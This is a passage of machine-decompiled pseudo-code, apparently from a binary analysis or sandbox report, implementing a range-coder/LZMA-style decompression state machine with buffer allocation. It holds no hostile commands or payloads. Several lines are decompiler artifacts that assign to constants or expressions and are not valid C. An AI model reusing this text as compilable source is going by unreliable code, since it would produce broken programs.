										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
